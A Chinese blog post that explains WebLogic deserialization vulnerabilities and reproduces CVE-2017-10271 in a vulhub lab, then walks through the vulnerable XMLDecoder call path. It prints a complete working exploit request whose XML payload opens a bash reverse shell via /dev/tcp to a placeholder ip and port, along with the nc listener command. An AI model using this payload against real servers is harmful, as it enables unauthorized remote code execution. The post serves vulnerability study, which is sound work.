weblogic反序列化漏洞的初级理解(一)

最新推荐文章于 2024-08-06 11:48:56 发布
最新推荐文章于 2024-08-06 11:48:56 发布
阅读量4.9k 收藏 17
点赞数 2
分类专栏: JAVA反序列化漏洞 笔记 文章标签: 安全漏洞 java weblogic
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Redredredfish/article/details/119869339
版权

啥是weblogic

WebLogic是Oracle发布的一个基于JAVAEE架构的web中间件
大概可以理解为tomcat pro max🙃

Weblogic反序列化漏洞的几个利用阶段
从利用方式来看,分为三类

1.直接通过T3协议发送恶意反序列化对象(CVE-2015-4582、CVE-2016-0638、CVE-2016-3510、CVE-2020-2555、CVE-2020-2883)
2.利用T3协议配合RMP或ND接口反向发送反序列化数据(CVE2017-3248、CVE2018-2628、CVE2018-2893、CVE2018-3245、CVE-2018-3191、CVE-2020-14644、CVE-2020-14645)还有利用IIOP协议的CVE-2020-2551
3.通过 javabean XML方式发送反序列化数据。(CVE2017-3506->CVE-2017-10271->CVE2019-2725->CVE-2019-2729)

漏洞复现
由于漏洞众多,搭建环境比较复杂,还是先利用vulhub中的CVE-2017-10271、CVE-2018-2628、CVE-2018-2894、CVE-2020-14882几个标志性的漏洞环境进行复现。

先从最古老的开始

CVE-2017-10271

影响范围:10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0

docker开启环境

root@kali:/vulhub/weblogic/CVE-2017-10271# docker-compose up -d

远古版本,环境好大先忍一下

等待的过程中先理解一下漏洞原理以及vulhub给出的poc

该漏洞主要针对weblogic的WLS-WebServices组件
属于上述反序列化漏洞利用的第三类
大致的原理通过传输javabean XML方式构造恶意XML数据造成代码执行

结合poc来看

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.8.0_131" class="java.beans.XMLDecoder">
                <void class="java.lang.ProcessBuilder">
                    <array class="java.lang.String" length="3">
                        <void index="0">
                            <string>/bin/bash</string>
                        </void>
                        <void index="1">
                            <string>-c</string>
                        </void>
                        <void index="2">
                            <string>bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1</string>
                        </void>
                    </array>
                    <void method="start" />
                </void>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body />
</soapenv:Envelope>

大概是向网站的/wls-wsat/CoordinatorPortType路径传入xml数据,这串xml目的是反弹shell
在这里插入图片描述
OK,环境起好开始复现

访问localhost:7001/wls-wsat/CoordinatorPortType,显示wls-wsat组件的一些配置信息,表示服务已经开启
在这里插入图片描述
本地监听6666端口

root@kali:/# nc -l -p 6666

bp抓包重放构造好的数据包,注意字段Content-Type改为text/xml
在这里插入图片描述
成功反弹shell,服务器执行了我们传入的
/bin/bash -c bash -i >& /dev/tcp/ip/port 0>&1
在这里插入图片描述

漏洞原理

漏洞利用的过程很简单
有两个疑问点

1.wls-wsat组件如何处理xml数据
2.造成反序列化漏洞的关键点在哪

尝试传入任意命令
在这里插入图片描述
在响应中看到了返回的xml数据以及整个处理过程的调用栈
在这里插入图片描述
在这里插入图片描述
可以看到处理过程最后调用了java.beans.XMLDecoder方法,该方法用于将XML数据反序列化为java对象,这里造成了无回显的命令执行

根据vulhub提供的技术文档、参考大佬的分析过程可以得知大致的处理过程
在这里插入图片描述

1.根据POC,当我们传入<soapenv>标签包裹的数据时,wls-wsat使用了weblogic自带的webservices处理程序来处理SOAP请求
2.该处理程序首先调用weblogic.wsee.jaxws.workcontext.WorkContextServerTube.processRequest方法获取到我们传入的xml数据为var1,定义var2为处理过的var1数据
3.通过var2.get()方法中的WorkAreaConstants.WORK_AREA_HEADER参数获取<work:WorkContext >标签中的内容
4.当var3不为空时,执行readHeaderOld(var3);

在这里插入图片描述

5.在readHeaderOld中,实例化了WorkContextXmlInputAdapter,此时方法内的var4是java标签里的内容

在这里插入图片描述

6.在实例化WorkContextXmlInputAdapter中,直接调用xmlDecoder反序列化传入的xml数据,也就是处理过的var4

从整个过程中可以发现,传入的xml数据从始至终都没有受到任何过滤,wls-wsat的类似剥洋葱的处理方式一层一层揭开最后直接反序列化,这样显然是很不安全滴。

Redredredfish
关注
专栏目录
反序列化漏洞原理_Weblogic 反序列化漏洞预警及解决方案
weixin_39788382的博客
12-14 2724
漏洞情况分析WebLogic Server 是美国甲骨文(Oracle)公司开发的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。wls9-async 组件为 WebLogic Server 提供异步通讯服务,默认应用于 WebLogic 部分版本。由于该 WAR 包在反序列化处理输入信息时存在缺...
反序列化漏洞原理_Weblogic XMLDecoder 反序列化漏洞
weixin_39997194的博客
12-11 608
这次来研究一下weblogic一些反序列化漏洞.主要是: CVE-2017-3506 ,CVE-2017-10271 CVE-2019-2725这三个CVE,就是一个不停绕过的过程.从CVE-2017-3506开始发现,官方设置黑名单,安全研究者绕过了两次.感觉可能会有第三次. 漏洞测试环境参考:Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(...
【网络安全---漏洞复现】WebLogic 反序列化漏洞(CVE-2019-2890)漏洞复现
m0_67844671的博客
09-19 1702
Weblogic在利用T3协议进行远程资源加载调用时,默认会进行黑名单过滤以保证反序列化安全。本漏洞绕过了Weblogic反序列化黑名单,使攻击者可以通过T3协议对存在漏洞Weblogic组件实施远程攻击。由于T3协议在Weblogic控制台开启的情况下默认开启,而Weblogic默认安装会自动开启控制台,所以攻击者可通过此漏洞造成远程代码执行,以控制Weblogic服务器。
Weblogic漏洞(CVE-2017-3506)
最新发布
qq_68186313的博客
08-06 276
Veblogic的WLS Security组件对外提供了webserver服务,其中使用了XMLDecoder:来解析用户输入的XML数据,在解析过程中出现反序列化漏洞,可导致任意命令执行。1、验证是否存在wls-wsat组件。4、使用哥斯拉连接回显的地址。2、使用漏洞利用工具检测。
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)
rumil的博客
09-19 8820
WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
weblogic反序列化基本概念
sojrs_sec的博客
12-03 4607
如图,weblogic反序列化在利用过程中,主要考虑四个部分 Deliver_way :payload通过什么方式传入服务器 Payload:payload是什么格式,xml本身即为序列化对象,可直接反序列化。ysoserial生成的payload,为序列化文件 Write object():若非序列化数据,则首先经过writeobject()进行序列化 Readobject():反序列化数据...
Weblogic XMLDecoder 反序列化漏洞原理漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
05-20 2624
本文介绍了Weblogic XMLDecoder反序列化相关的漏洞原理和poc的构造,并以CVE-2017-10271为例在vulhub上进行了复现。有关Weblogic XMLDecoder反序列化漏洞包括CVE-2017-3506、CVE-2017-10271、CVE-2019-2725、CVE-2019-2729等,其漏洞原理相似,本文对此进行了简要介绍。
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .txt
06-27
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .网上几乎没有,请珍惜。
2018最新weblogic反序列化漏洞补丁包
05-22
在p27395085_1036_Generic补丁的基础上再打上27453773_1036_Gener,解决CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2018-2628
【技术推荐】WebLogic 反序列化漏洞深入分析
m0_73257876的博客
09-25 3182
WebLogic 漏洞存在较多的反序列化类和反序列化的途径,在使用黑名单防御手段下,攻击者只要找到新的反序列化触发点,就能造成新的危害。比如,你有一个类 A,类里面有个属性是类 B,这个时候,在反序列化的过程中,就会先反序列化类 A,之后在填充类 A 的过程中,继续反序列化类 B,类 B 在反序列化完成后,填充到类 A 中,同时整个过程都在一个流中操作,这个时候,只要还是 ObjectOutStream 的 read_value进行反序列化操作就不能饶过黑名单!
weblogic反序列化.zip
07-08
简单的日常weblogic 应用的反序列化漏洞补丁方法和临时整改方法
weblogic10.3.6反序列化补丁包
06-22
weblogic10.3.6.0反序列化补丁包,p20780171_1036_Generic (2).zip补丁包和p22248372_1036012_Generic.zip升级包,要先安装升级包在安装补丁包
weblogic反序列化漏洞测试jar包
02-17
weblogic反序列化漏洞测试jar包 如涉及版权问题请与我联系
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ)
01-09
然而,与所有软件一样,Weblogic也存在安全漏洞,其中CVE-2017-10271是一个著名的反序列化漏洞。 CVE-2017-10271漏洞源于Weblogic服务器中WLS-Windows-Autopatch组件处理特定类型输入的反序列化过程。这个组件是...
web反序列化漏洞原理_CVE-2017-3248——WebLogic反序列化初探_零开始网络安全技巧
程序员六七的博客
07-16 579
安全客 - 安全资讯平台
weblogic反序列化
m0_67284865的博客
07-02 448
weblogic的两种反序列化:xml和wls
weblogic预警及历史漏洞
a1b2c3是弱口令
10-17 1250
简介 1、 Oracle WebLogic CVE-2019-2891 漏洞预警 2、WebLogic历史漏洞回顾 1.预警 Oracle 官方发布了 2019 年 10 月的严重补丁更新 CPU(Critical Patch Update),其中修复了存在于 WebLogic 中的一个高危漏洞(CVE-2019-2891)。 1.1预警描述 此漏洞为远程代码执行漏洞,基于全球使用该产品用...
weblogic反序列化_从Weblogic原理上探究CVE20154852、CVE20160638、CVE20163510究竟怎么一回事...
weixin_39612653的博客
11-29 1318
更多全球网络安全资讯尽在邑安全目前。网上关于CVE-2015-4852漏洞的资料很多,但是针对CVE-2015-4852漏洞如何修复,修复补丁又是如何生效的却少之又少;而CVE-2016-0638、CVE-2016-3510这两个漏洞又是如何绕过CVE-2015-4852补丁的,则只是在介绍Weblogic系列漏洞时被一句话带过。CVE-2015-4852、CVE-2016-0638以及...
weblogic 反序列化漏洞检测工具
09-12
您好!对于WebLogic反序列化漏洞的检测,可以使用以下几种工具: 1. ysoserial:这是一个常用的Java反序列化漏洞利用工具,可以生成不同Payload来测试WebLogic反序列化漏洞。您可以通过Github找到它的相关代码和用法。 2. AppScan:这是一款商业化的Web应用安全测试工具,支持对WebLogic等服务器的漏洞扫描与检测,可以帮助您发现WebLogic反序列化漏洞。 3. OWASP ZAP:这是一个开源的Web应用安全扫描工具,也可以用来检测WebLogic反序列化漏洞。您可以使用其自带的漏洞扫描功能进行测试。 以上是一些常用的WebLogic反序列化漏洞检测工具,您可以根据实际情况选择适合您的工具进行使用。同时,在进行任何漏洞扫描和测试之前,请确保已获得合法授权,并遵循适用的法律法规。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Redredredfish

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值